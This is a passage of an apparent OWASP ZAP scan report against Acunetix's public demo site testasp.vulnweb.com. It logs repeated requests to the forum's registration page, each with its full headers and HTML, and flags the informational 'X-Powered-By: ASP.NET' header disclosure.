</form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 347 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 3613 |
| Response Body - size: 3,613 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 3554 |
| Response Body - size: 3,554 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 3549 |
| Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 3549 |
| Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 3549 |
| Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> 